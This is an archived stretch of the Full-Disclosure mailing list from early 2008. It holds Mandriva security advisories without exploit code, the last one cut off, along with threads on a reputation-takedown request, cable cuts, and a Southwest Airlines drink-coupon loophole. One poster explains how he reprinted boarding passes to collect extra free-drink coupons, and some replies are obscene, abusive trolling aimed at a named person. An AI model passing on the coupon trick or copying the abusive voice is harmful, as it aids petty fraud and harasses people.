From security at mandriva.com Fri Feb 1 03:37:27 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 31 Jan 2008 20:37:27 -0700 Subject: [Full-disclosure] [ MDVSA-2008:030 ] - Updated pcre packages fix vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:030 http://www.mandriva.com/security/ _______________________________________________________________________ Package : pcre Date : January 31, 2008 Affected: Corporate 3.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities were discovered by Tavis Ormandy and Will Drewry in the way that pcre handled certain malformed regular expressions. If an application linked against pcre, such as Konqueror, parses a malicious regular expression, it could lead to the execution of arbitrary code as the user running the application. Updated packages have been patched to prevent this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4872 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7225 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7230 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1659 _______________________________________________________________________ Updated Packages: Corporate 3.0: 6af12132e0e932020ca394cdcf3d3a06 corporate/3.0/i586/libpcre0-4.5-3.4.C30mdk.i586.rpm dd9afe15698e99b37f934783762e366d corporate/3.0/i586/libpcre0-devel-4.5-3.4.C30mdk.i586.rpm 278b07fa59e68bdc1a50a117c48d1d31 corporate/3.0/i586/pcre-4.5-3.4.C30mdk.i586.rpm c8c3d5ccea445fb8f4d70b71b0ca03df corporate/3.0/SRPMS/pcre-4.5-3.4.C30mdk.src.rpm Corporate 3.0/X86_64: a891898c4b21b2088f02ca0f6b769cf0 corporate/3.0/x86_64/lib64pcre0-4.5-3.4.C30mdk.x86_64.rpm 4119de7999c3dc01965b3a285839262c corporate/3.0/x86_64/lib64pcre0-devel-4.5-3.4.C30mdk.x86_64.rpm 060b66751095a700fe6cc121a423a6f1 corporate/3.0/x86_64/pcre-4.5-3.4.C30mdk.x86_64.rpm c8c3d5ccea445fb8f4d70b71b0ca03df corporate/3.0/SRPMS/pcre-4.5-3.4.C30mdk.src.rpm Multi Network Firewall 2.0: 234f4af314478d52e438785b3350f3d8 mnf/2.0/i586/libpcre0-4.5-3.4.M20mdk.i586.rpm 0bb7eab034f55e8d7704ef043646ea0a mnf/2.0/i586/libpcre0-devel-4.5-3.4.M20mdk.i586.rpm 8056c796cfe2fd4d51e25df9beb075da mnf/2.0/i586/pcre-4.5-3.4.M20mdk.i586.rpm 2d87fce9af8d81c91d86dc81c4fff97b mnf/2.0/SRPMS/pcre-4.5-3.4.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHomkzmqjQ0CJFipgRAjacAKDAL0SNJp1Q6+mDzeljVZuEVjvgfgCfV3GQ J636Bfy0MTNt3vNvEtVwXaQ= =oABM -----END PGP SIGNATURE----- From fdiggle at gmail.com Fri Feb 1 04:00:46 2008 From: fdiggle at gmail.com (Fredrick Diggle) Date: Thu, 31 Jan 2008 22:00:46 -0600 Subject: [Full-disclosure] A friendly request on behalf of Bart Cilfone In-Reply-To: References: <5f651f2b0801280523j720bd2btbb175c456a180394@mail.gmail.com> Message-ID: How much does the reputation Defender charge for to send the emails to mailing lists begging that they take down bad things about Fredrick Diggle. He is interested in their services and also for to have them ban certain libel people from the internets. Is this possible and how much will it cost Fredrick Diggle? His salary is not high at the zoo but he would be willing to pay a fair sum. YAY! On Jan 28, 2008 12:30 PM, reepex wrote: > lol best troll ever > > > > On 1/28/08, Donald Republic wrote: > > > > > > > > Dear Full Disclosure, > > > > We are writing to you in behalf of Bart Cilfone. He has asked us to > contact you and see if you will consider removing the content about him at: > > > > http://seclists.org/fulldisclosure/2008/Jan/0497.html > > > > Please allow us to introduce ourselves. We are ReputationDefender, Inc., a > company dedicated to helping our clients preserve their good name on the > Internet. Our founders and employees are all regular Internet users. Like > our clients, and perhaps like you, we think the Internet is sometimes > unnecessarily hurtful to the privacy and reputations of everyday people. > Even content that is meant to be informative can sometimes have a > significant and negative impact on someone's job prospects, student > applications, and personal life. We invite you to learn more about who we > are, at www.reputationdefender.com. > > > > When our clients sign up with our service, we undertake deep research > about them on the Internet to see what the Web is saying about them. We find > sites where they are discussed, and we ask our clients how they feel about > those sites. Sometimes our clients express strong reservations about the > content on particular websites. They may feel hurt, ashamed, or "invaded" by > the content about them on those sites. > > > > As you may know, more and more prospective employers, universities, and > newfound friends and romantic interests undertake Internet research, and the > material they find can strongly impact their impressions of the people they > are getting to know. When people apply for jobs, apply for college or > graduate school, apply for loans, begin dating, or seek to do any number of > other things with their lives, hurtful content about them on the Internet > can have a negative impact on their opportunities. At some point or another, > most of us say things about ourselves or our friends and acquaintances we > later regret. We're all human, and we all do it! > > > > We are writing to you today because our client, Bart Cilfone, has told us > that he would like the content about him on your website to be removed as it > is outdated and disturbing to him. Would you be willing to remove or alter > the content? It would mean so much to Mr. Cilfone, and to us. Considerate > actions such as these will go a long way to help make the Internet a more > civil place. > > > > Thank you very much for your consideration. We are mindful that matters > like these can be sensitive. We appreciate your time. > > > > Please let us know if you have removed or changed the content on this site > by sending an e-mail to: cilfone.law at gmail.com. > > > > > > Yours sincerely, > > > > Donald Republic > > Reputation Defender Service Team > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From icetre at digitalfreezer.net Fri Feb 1 02:38:11 2008 From: icetre at digitalfreezer.net (Adam Chesnutt) Date: Thu, 31 Jan 2008 18:38:11 -0800 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness Message-ID: <47A28613.3070402@digitalfreezer.net> Not sure if anyone posted this before; But I figured this would interest you guys... Southwest Airlines has a class of ticket called 'Business Select'. This ticket typically allows you to board the plane first, and because SWA doesn't have assigned seating means you have your pick of the seats on the plane. But there is quite an additional benefit. You also get a free drink ticket. But they seem to have forgotten something in the implementation of this: Being your drink coupon is issued to you when you print your boarding pass. It's also printed whenever you *reprint* your boarding pass! So if you feel like getting drunk on your flight, just print seven or eight boarding passes, and you'll have a good flight. I tried this a couple of weeks ago on a flight from San Diego to Kansas City, and I had myself 4 free drinks no problem. Adam From volcimaster at gmail.com Fri Feb 1 13:27:07 2008 From: volcimaster at gmail.com (Warren Myers) Date: Fri, 1 Feb 2008 08:27:07 -0500 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: <47A28613.3070402@digitalfreezer.net> References: <47A28613.3070402@digitalfreezer.net> Message-ID: They don't track who they've given a drink to? Interesting. Though, I suppose there would be some people flying who wouldn't want the freebie, and could give theirs to someone else anyway. WMM On Jan 31, 2008 9:38 PM, Adam Chesnutt wrote: > Not sure if anyone posted this before; But I figured this would interest > you guys... > > Southwest Airlines has a class of ticket called 'Business Select'. This > ticket typically allows you to board the plane first, and because SWA > doesn't have assigned seating means you have your pick of the seats on > the plane. But there is quite an additional benefit. > > You also get a free drink ticket. But they seem to have forgotten > something in the implementation of this: Being your drink coupon is > issued to you when you print your boarding pass. It's also printed > whenever you *reprint* your boarding pass! > > So if you feel like getting drunk on your flight, just print seven or > eight boarding passes, and you'll have a good flight. I tried this a > couple of weeks ago on a flight from San Diego to Kansas City, and I had > myself 4 free drinks no problem. > > Adam > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://warrenmyers.com "God may not play dice with the universe, but something strange is going on with the prime numbers." --Paul Erd?s "It's not possible. We are the type of people who have everything in our favor going against us." --Ben Jarhvi, Short Circuit 2 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080201/0881bf83/attachment.html From joey.mengele at hushmail.com Fri Feb 1 14:17:27 2008 From: joey.mengele at hushmail.com (Joey Mengele) Date: Fri, 01 Feb 2008 09:17:27 -0500 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness Message-ID: <20080201141727.6F18011803C@mailserver5.hushmail.com> Dear Adam, I have discovered a similar issue. During a game of monopoly, I was able to use money that I had printed from my personal computer (CPU). Thanks. J "In fact, if Christ himself stood in my way, I, like Nietzsche, would not hesitate to squish him like a worm" - Gadi Evron On Thu, 31 Jan 2008 21:38:11 -0500 Adam Chesnutt wrote: >Not sure if anyone posted this before; But I figured this would >interest >you guys... > >Southwest Airlines has a class of ticket called 'Business Select'. >This >ticket typically allows you to board the plane first, and because >SWA >doesn't have assigned seating means you have your pick of the >seats on >the plane. But there is quite an additional benefit. > >You also get a free drink ticket. But they seem to have forgotten >something in the implementation of this: Being your drink coupon >is >issued to you when you print your boarding pass. It's also printed > >whenever you *reprint* your boarding pass! > >So if you feel like getting drunk on your flight, just print seven >or >eight boarding passes, and you'll have a good flight. I tried this >a >couple of weeks ago on a flight from San Diego to Kansas City, and >I had >myself 4 free drinks no problem. > >Adam > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html -- Love Graphic Design? Find a school near you. Click Now. http://tagline.hushmail.com/fc/Ioyw6h4fQlAf4U5QSoDQ2CEtemxqI4USurGI4vjQ3tV19zB4tTg7Ly/ >Hosted and sponsored by Secunia - http://secunia.com/ From coderman at gmail.com Fri Feb 1 22:23:43 2008 From: coderman at gmail.com (coderman) Date: Fri, 1 Feb 2008 14:23:43 -0800 Subject: [Full-disclosure] undersea cable cut and internet problem! In-Reply-To: <41011d980801310805laadfd17oe7e85a521aafc8cc@mail.gmail.com> References: <41011d980801310805laadfd17oe7e85a521aafc8cc@mail.gmail.com> Message-ID: <4ef5fec60802011423u4d825486jbff63ba5ad5b4fdd@mail.gmail.com> On Jan 31, 2008 8:05 AM, crazy frog crazy frog wrote: > http://www.cnn.com/2008/WORLD/meast/01/31/dubai.outage/index.html really a bad week for cable cuts. FLAG has been severed twice: http://news.bbc.co.uk/1/hi/technology/7222536.stm i am curious if the congestion / outages to some of asia / middle east have had any perceptible impact on bot nets or spam level... From icetre at digitalfreezer.net Fri Feb 1 05:48:32 2008 From: icetre at digitalfreezer.net (Adam Chesnutt) Date: Thu, 31 Jan 2008 21:48:32 -0800 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: <2d6724810801312112q5840004ep2a761b1b2a486cc8@mail.gmail.com> References: <47A28613.3070402@digitalfreezer.net> <2d6724810801312112q5840004ep2a761b1b2a486cc8@mail.gmail.com> Message-ID: <47A2B2B0.9040106@digitalfreezer.net> What Image? You just go to the kiosk and swipe a credit card, chosing the option 'Reprint boarding pass'. You have to of course have booked travel using the 'Business Select' option which is basically a fully refundable ticket with a few extra perks (one of which being you get double credit for that flight on their frequent flyer program, considering it only takes 8 round trip tickets in the first place you can see why I pick this ticket when flying for business travel) I really only tried it myself because I wanted to see if the flight attendants would stop me from using multiple coupons. I figured they'd let me get away with 2 because, they don't know, I might be using both coupons on a multi leg flight, but 4 is more than a little obvious something fishy is going on. Of course I tried to tip her handsomely; but she told me she couldn't accept it unless I was paying cash. ? Odd... Anyways, I thought it was a rather interesting oversight in policy and a neat security hole. :) I attempted to call the 800 number to report the issue, but they didn't have a clue what to do about it or who to talk to, so I figured I'd post it here. T Biehn wrote: > thats awesome dude, could you ahem forward me a copy of that image ahem > > On Jan 31, 2008 9:38 PM, Adam Chesnutt wrote: > >> Not sure if anyone posted this before; But I figured this would interest >> you guys... >> >> Southwest Airlines has a class of ticket called 'Business Select'. This >> ticket typically allows you to board the plane first, and because SWA >> doesn't have assigned seating means you have your pick of the seats on >> the plane. But there is quite an additional benefit. >> >> You also get a free drink ticket. But they seem to have forgotten >> something in the implementation of this: Being your drink coupon is >> issued to you when you print your boarding pass. It's also printed >> whenever you *reprint* your boarding pass! >> >> So if you feel like getting drunk on your flight, just print seven or >> eight boarding passes, and you'll have a good flight. I tried this a >> couple of weeks ago on a flight from San Diego to Kansas City, and I had >> myself 4 free drinks no problem. >> >> Adam >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> From coderman at gmail.com Fri Feb 1 09:17:32 2008 From: coderman at gmail.com (coderman) Date: Fri, 1 Feb 2008 01:17:32 -0800 Subject: [Full-disclosure] A friendly request on behalf of Bart Cilfone In-Reply-To: <5f651f2b0801280523j720bd2btbb175c456a180394@mail.gmail.com> References: <5f651f2b0801280523j720bd2btbb175c456a180394@mail.gmail.com> Message-ID: <4ef5fec60802010117wb17e055va15f80115f2de840@mail.gmail.com> On Jan 28, 2008 5:23 AM, Donald Republic wrote: > Dear Full Disclosure, > > We are writing to you in behalf of Bart Cilfone. He has asked us to > request an anal raping of his virgina anus. please ass rape this motherfucker for employing our services!!!! WILL DO!!! NO MORE REQUESTS NEEDED!!! THANKS U FUCKING SHIT FOR BRAINZ!!!! best regards, From coderman at gmail.com Fri Feb 1 09:19:06 2008 From: coderman at gmail.com (coderman) Date: Fri, 1 Feb 2008 01:19:06 -0800 Subject: [Full-disclosure] A friendly request on behalf of Bart Cilfone In-Reply-To: References: <5f651f2b0801280523j720bd2btbb175c456a180394@mail.gmail.com> Message-ID: <4ef5fec60802010119o6d267c2ep1053f04a234fbffc@mail.gmail.com> On Jan 31, 2008 8:00 PM, Fredrick Diggle wrote: > How much does the reputation Defender charge... dude, reputation defender is the shit. they are paying me $20 per email to spam what a deal!! reputation defender rocks!!!! OMG!!! PWNIES!! From coderman at gmail.com Fri Feb 1 09:37:06 2008 From: coderman at gmail.com (coderman) Date: Fri, 1 Feb 2008 01:37:06 -0800 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: <47A28613.3070402@digitalfreezer.net> References: <47A28613.3070402@digitalfreezer.net> Message-ID: <4ef5fec60802010137x32effd98gdea0c899eaed99ce@mail.gmail.com> HELLO INDIAN On Jan 31, 2008 6:38 PM, Adam Chesnutt wrote: > Not sure if anyone posted this before; But I figured this would interest > you guys... TSA == FULL IF FUCKING IGNORANT FUCKS so this is a kinown vulnerability. what was the question agtain? coderman, pwnder by nbusmillls whiskey From security at mandriva.com Fri Feb 1 09:54:01 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 01 Feb 2008 02:54:01 -0700 Subject: [Full-disclosure] [ MDVSA-2008:031 ] - Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:031 http://www.mandriva.com/security/ _______________________________________________________________________ Package : xdg-utils Date : February 1, 2008 Affected: 2007.1, 2008.0 _______________________________________________________________________ Problem Description: A vulnerability was found in xdg-open and xdg-email commands, which allows remote attackers to execute arbitrary commands if the user is tricked into trying to open a maliciously crafted URL. The updated packages have been patched to prevent the issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0386 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 87a609bef7d4f1fa89f679f799ab894d 2007.1/i586/xdg-utils-1.0.1-3.1mdv2007.1.i586.rpm 91ece389fe517eb37340dab3fdb80b80 2007.1/SRPMS/xdg-utils-1.0.1-3.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: a5678edc7717df385ff063cd3dd8d1ed 2007.1/x86_64/xdg-utils-1.0.1-3.1mdv2007.1.x86_64.rpm 91ece389fe517eb37340dab3fdb80b80 2007.1/SRPMS/xdg-utils-1.0.1-3.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 8ae9d8bf4d89f62326e06ed19d89642d 2008.0/i586/xdg-utils-1.0.2-3.1mdv2008.0.i586.rpm e69a33c4cdead90fa44d021902722411 2008.0/SRPMS/xdg-utils-1.0.2-3.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 7e8c83cb1957521497ceff756a0ea79f 2008.0/x86_64/xdg-utils-1.0.2-3.1mdv2008.0.x86_64.rpm e69a33c4cdead90fa44d021902722411 2008.0/SRPMS/xdg-utils-1.0.2-3.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHosG2mqjQ0CJFipgRAljmAJ0Wm9EggH2vTlk11xp93Z6dT/rJ1QCgp+WG O7VJzyV2VcCSisQWRm44H+M= =WeXx -----END PGP SIGNATURE----- From nate.mcfeters at gmail.com Fri Feb 1 13:39:03 2008 From: nate.mcfeters at gmail.com (nate.mcfeters at gmail.com) Date: Fri, 1 Feb 2008 13:39:03 +0000 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: <47A28613.3070402@digitalfreezer.net> References: <47A28613.3070402@digitalfreezer.net> Message-ID: <905701728-1201873039-cardhu_decombobulator_blackberry.rim.net-1641840151-@bxe102.bisx.prod.on.blackberry> Bad ass! Sent via BlackBerry from T-Mobile -----Original Message----- From: Adam Chesnutt Date: Thu, 31 Jan 2008 18:38:11 To:full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Southwest Airlines Ticket Silliness Not sure if anyone posted this before; But I figured this would interest you guys... Southwest Airlines has a class of ticket called 'Business Select'. This ticket typically allows you to board the plane first, and because SWA doesn't have assigned seating means you have your pick of the seats on the plane. But there is quite an additional benefit. You also get a free drink ticket. But they seem to have forgotten something in the implementation of this: Being your drink coupon is issued to you when you print your boarding pass. It's also printed whenever you *reprint* your boarding pass! So if you feel like getting drunk on your flight, just print seven or eight boarding passes, and you'll have a good flight. I tried this a couple of weeks ago on a flight from San Diego to Kansas City, and I had myself 4 free drinks no problem. Adam _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From icetre at digitalfreezer.net Sat Feb 2 04:13:01 2008 From: icetre at digitalfreezer.net (Adam Chesnutt) Date: Fri, 1 Feb 2008 20:13:01 -0800 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: <20080201141727.6F18011803C@mailserver5.hushmail.com> References: <20080201141727.6F18011803C@mailserver5.hushmail.com> Message-ID: <41a9dc560802012013h755b292av3366da9096d591d4@mail.gmail.com> Insightful... Really.. I posted about an amusing flaw I found in the systems and policies of a public company. I have to complement you though, that was a really nice retort.. Obviously being clever isn't working out for you.. Maybe you should just stop. If your going to make fun of me, you really should try harder.. That was just fail. Adam On 2/1/08, Joey Mengele wrote: > > Dear Adam, > > I have discovered a similar issue. During a game of monopoly, I was > able to use money that I had printed from my personal computer > (CPU). > > Thanks. > > J > > "In fact, if Christ himself stood in my way, I, like Nietzsche, > would not hesitate to squish him like a worm" - Gadi Evron > > > On Thu, 31 Jan 2008 21:38:11 -0500 Adam Chesnutt > wrote: > >Not sure if anyone posted this before; But I figured this would > >interest > >you guys... > > > >Southwest Airlines has a class of ticket called 'Business Select'. > >This > >ticket typically allows you to board the plane first, and because > >SWA > >doesn't have assigned seating means you have your pick of the > >seats on > >the plane. But there is quite an additional benefit. > > > >You also get a free drink ticket. But they seem to have forgotten > >something in the implementation of this: Being your drink coupon > >is > >issued to you when you print your boarding pass. It's also printed > > > >whenever you *reprint* your boarding pass! > > > >So if you feel like getting drunk on your flight, just print seven > >or > >eight boarding passes, and you'll have a good flight. I tried this > >a > >couple of weeks ago on a flight from San Diego to Kansas City, and > >I had > >myself 4 free drinks no problem. > > > >Adam > > > > > >_______________________________________________ > >Full-Disclosure - We believe in it. > >Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080201/c1968f4c/attachment.html From i.m.crazy.frog at gmail.com Sat Feb 2 04:10:54 2008 From: i.m.crazy.frog at gmail.com (crazy frog crazy frog) Date: Sat, 2 Feb 2008 09:40:54 +0530 Subject: [Full-disclosure] undersea cable cut and internet problem! In-Reply-To: <4ef5fec60802011423u4d825486jbff63ba5ad5b4fdd@mail.gmail.com> References: <41011d980801310805laadfd17oe7e85a521aafc8cc@mail.gmail.com> <4ef5fec60802011423u4d825486jbff63ba5ad5b4fdd@mail.gmail.com> Message-ID: <41011d980802012010i73e7dc5ej265973920066c1f2@mail.gmail.com> not sure but most of the botnets or spam originates from USA? On Feb 2, 2008 3:53 AM, coderman wrote: > On Jan 31, 2008 8:05 AM, crazy frog crazy frog wrote: > > http://www.cnn.com/2008/WORLD/meast/01/31/dubai.outage/index.html > > really a bad week for cable cuts. FLAG has been severed twice: > > http://news.bbc.co.uk/1/hi/technology/7222536.stm > > i am curious if the congestion / outages to some of asia / middle east > have had any perceptible impact on bot nets or spam level... > -- advertise on secgeeks? http://secgeeks.com/Advertising_on_Secgeeks.com http://newskicks.com From security at mandriva.com Fri Feb 1 22:34:48 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 01 Feb 2008 15:34:48 -0700 Subject: [Full-disclosure] [ MDVSA-2008:032 ] - Updated boost packages fix DoS vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:032 http://www.mandriva.com/security/ _______________________________________________________________________ Package : boost Date : February 1, 2008 Affected: 2007.0, 2007.1, 2008.0 _______________________________________________________________________ Problem Description: Tavis Ormandy and Will Drewry found that the bost library did not properly perform input validation on regular expressions. An attacker could exploit this by sening a specially crafted regular expression to an application linked against boost and cause a denial of service via an application crash. The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0171 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0172 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 050747f9a2c9557d33977d9bd51184b2 2007.0/i586/libboost1-1.33.1-3.1mdv2007.0.i586.rpm 447ac5fc34d29669c8a21b7abd677413 2007.0/i586/libboost1-devel-1.33.1-3.1mdv2007.0.i586.rpm 4b4b7ff3d032516cd2f22af208ef7d3b 2007.0/i586/libboost1-examples-1.33.1-3.1mdv2007.0.i586.rpm b084ed15b24c16e41ea2660732d1fa53 2007.0/i586/libboost1-static-devel-1.33.1-3.1mdv2007.0.i586.rpm 4b9252988703c7360d91138aa1b738b7 2007.0/SRPMS/boost-1.33.1-3.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 9b983d8a118824218998792630a93368 2007.0/x86_64/lib64boost1-1.33.1-3.1mdv2007.0.x86_64.rpm f975c8790f99728dd3635b0a79a2b639 2007.0/x86_64/lib64boost1-devel-1.33.1-3.1mdv2007.0.x86_64.rpm 8349cb46e64007d854902abe784278d8 2007.0/x86_64/lib64boost1-examples-1.33.1-3.1mdv2007.0.x86_64.rpm 8781b8e9cac3079e22be542dc89679e0 2007.0/x86_64/lib64boost1-static-devel-1.33.1-3.1mdv2007.0.x86_64.rpm 4b9252988703c7360d91138aa1b738b7 2007.0/SRPMS/boost-1.33.1-3.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 4e2b108f19e9e77cacd23f950a287c1a 2007.1/i586/libboost1-1.33.1-5.1mdv2007.1.i586.rpm 953ecb0bb51516d5a860947c6ec3cca3 2007.1/i586/libboost1-devel-1.33.1-5.1mdv2007.1.i586.rpm cec00f6e2461c188e12248ec1085b64a 2007.1/i586/libboost1-examples-1.33.1-5.1mdv2007.1.i586.rpm 7f3150b483155ba9ddc5ce9b9c6a24b1 2007.1/i586/libboost1-static-devel-1.33.1-5.1mdv2007.1.i586.rpm 0133bec4e45c53c26b59fe599b0c2ef3 2007.1/SRPMS/boost-1.33.1-5.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 55150e1ce05e3d3385815648cd4924ba 2007.1/x86_64/lib64boost1-1.33.1-5.1mdv2007.1.x86_64.rpm 93d7474def1e122c4ddf5fab1e81dfd6 2007.1/x86_64/lib64boost1-devel-1.33.1-5.1mdv2007.1.x86_64.rpm 59dd3438007e7d383d3cbaa1b2eacb38 2007.1/x86_64/lib64boost1-examples-1.33.1-5.1mdv2007.1.x86_64.rpm a213a0ee7cdc1b75fbbde6835a7295db 2007.1/x86_64/lib64boost1-static-devel-1.33.1-5.1mdv2007.1.x86_64.rpm 0133bec4e45c53c26b59fe599b0c2ef3 2007.1/SRPMS/boost-1.33.1-5.1mdv2007.1.src.rpm Mandriva Linux 2008.0: e184b23843e35d7365033cc6cb45f2dd 2008.0/i586/libboost1-1.33.1-6.1mdv2008.0.i586.rpm 6fa2ca96cb71d8bd3e54aa2f05118017 2008.0/i586/libboost1-devel-1.33.1-6.1mdv2008.0.i586.rpm aa82d51548030d03ad1e86a174013333 2008.0/i586/libboost1-examples-1.33.1-6.1mdv2008.0.i586.rpm 42d0e230fca8ac7b094f9d159e9d8758 2008.0/i586/libboost1-static-devel-1.33.1-6.1mdv2008.0.i586.rpm e4b3da7cdfb5210d65c5b60556e9744e 2008.0/SRPMS/boost-1.33.1-6.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: af70bbe3671b92f97d09e845682609ca 2008.0/x86_64/lib64boost1-1.33.1-6.1mdv2008.0.x86_64.rpm 3597c04eea3dea15c278cdb3f0bbcc8e 2008.0/x86_64/lib64boost1-devel-1.33.1-6.1mdv2008.0.x86_64.rpm 65468c84027dbe61a43146a82a5a76e8 2008.0/x86_64/lib64boost1-examples-1.33.1-6.1mdv2008.0.x86_64.rpm 3a6b5ed6fffb8d18358729afb1f9ebc1 2008.0/x86_64/lib64boost1-static-devel-1.33.1-6.1mdv2008.0.x86_64.rpm e4b3da7cdfb5210d65c5b60556e9744e 2008.0/SRPMS/boost-1.33.1-6.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHo3O/mqjQ0CJFipgRAozdAJ0Qe58yTq1/ixDFIv1agB1CsHNDTQCgzkD0 ElZ73niXQ2YtpGfyYZP4y2g= =5OJm -----END PGP SIGNATURE----- From security at mandriva.com Fri Feb 1 23:21:20 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 01 Feb 2008 16:21:20 -0700 Subject: [Full-disclosure] [ MDVSA-2008:033 ] - Updated ruby-gnome2 packages fix arbitrary code execution vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:033 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ruby-gnome2 Date : February 1, 2008 Affected: 2007.1, 2008.0 _______________________________________________________________________ Problem Description: A format string vulnerability in Ruby-GNOME 2 0.16.0, and SVN versions before 20071127, allows context-dependent attackers to execute arbitrary code via format string specifiers in the message parameter. The updated packages have been patched to prevent this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6183 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 8d9b3509f96a3461738224c17c1bd27a 2007.1/i586/ruby-atk-0.16.0-2.1mdv2007.1.i586.rpm 3a072a39a5bfafbd69074186bfeba886 2007.1/i586/ruby-gconf2-0.16.0-2.1mdv2007.1.i586.rpm 8dc250b8d2dba8bbb528edb5bfb049b1 2007.1/i586/ruby-gdkpixbuf2-0.16.0-2.1mdv2007.1.i586.rpm 351217998c27dd3438296bf09bdb23c8 2007.1/i586/ruby-glib2-0.16.0-2.1mdv2007.1.i586.rpm bd1f01c6cb835cce182d446811c1ebdb 2007.1/i586/ruby-gnome2-0.16.0-2.1mdv2007.1.i586.rpm 415b8f4ab7b6bf1917f33f1462322f75 2007.1/i586/ruby-gnome2-devel-0.16.0-2.1mdv2007.1.i586.rpm 8c2170d7ab383640b0e967fc7d57f294 